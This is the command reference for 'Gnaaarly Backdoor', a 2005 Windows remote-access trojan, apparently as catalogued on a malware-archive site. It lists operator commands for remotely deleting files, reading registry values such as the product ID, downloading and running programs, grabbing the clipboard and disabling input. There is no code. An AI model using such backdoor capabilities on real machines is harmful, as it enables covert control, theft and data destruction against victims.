Gnaaarly Backdoor

Gnaaarly Backdoor
(Backdoor.Win32.VB.ago)
(Backdoor.Win32.Small.gp)
by DiA
Released in May 2005


Commands:

Client
######
!help					- this help
!cls					- clear screen
!quit					- close client, server is still open

Server
######
Fun:
  !msgbox 'Caption' 'Message'		- shows a message box
  !mouse 'disable/enable'		- disables or enables mouse
  !input 'disable/enable'		- disables or enables keyboard and mouse
  !cdrom 'open/close'			- open or close cd-rom
  !start 'hide/show'			- hide or show windows start button
  !monitor 'on/off'			- turns monitor on or off
Examples:
  !msgbox 'Gnaaarly Backdoor' 'A gnaaarly backdoor is running...'
  !mouse 'disable'
  !mouse 'enable'
  !input 'disable'
  !input 'enable'
  !cdrom 'open'
  !cdrom 'close'
  !start 'hide'
  !start 'show'
  !monitor 'off'
  !monitor 'on'

Paths:
  !windowspath				- returns windows directory
  !systempath				- returns system directory
  !location				- returns the location of the running server
  !getdirectory				- returns the current directory
  !setdirectory 'Path'			- set a new current directory
Examples:
  !setdirectory 'C:\Windows'

Lists:
  !dirlist 'Path'			- list all directorys in path
  !filelist 'Path'			- list all directorys in path
Examples:
  !dirlist 'D:\'
  !filelist 'C:'

Files:
  !copyfile 'Existing' 'New'		- copy a file, do not copy if already exist
  !movefile 'Existing' 'New'		- move a file, do not move if already exist
  !deletefile 'Existing'		- deletes an existing file
Examples:
  !copyfile 'C:\Windows\Notepad.exe' 'C:\Editor.exe'
  !movefile 'C:\Editor.exe' 'C:\edit.exe'
  !deletefile 'C:\edit.exe'

Registry:
  !regwrite 'HKEY' 'Subkey' 'Name' 'Value' - write a string to the registry
  !regread 'HKEY' 'Subkey' 'ValueName'	   - returns a string from registry
Examples:
  !regwrite 'HKEY_CURRENT_USER' 'Console' 'FaceName' 'Gnaaarly'
  !regread 'HKEY_LOCAL_MACHINE' 'SOFTWARE\Microsoft\Windows\CurrentVersion' 'ProductId'

Applications:
  !execute 'Path'			- executes a application
Examples:
  !execute 'C:\Windows\Notepad.exe'

Internet:
  !download 'URL' 'Path'		- download a file from inet to local
Examples:
  !download 'http://home.arcor.de/vx-dia/index.htm' 'C:\firstpage.htm'

Exit Windows:
  !shutdown				- shutdown windows
  !reboot				- reboot windows

Clipboard:
  !getclipboard				- returns the text in the clipboard if exist
  !setclipboard 'Text'			- copy a new text into clipboard
Examples:
  !setclipboard 'visit www.vx-dia.de.vu !!!'

Connection:
  !close	
  
DiA  


Server:
size: 13,824 bytes

port: 30687 TCP

tested on Windows XP
February 07, 2006
MegaSecurity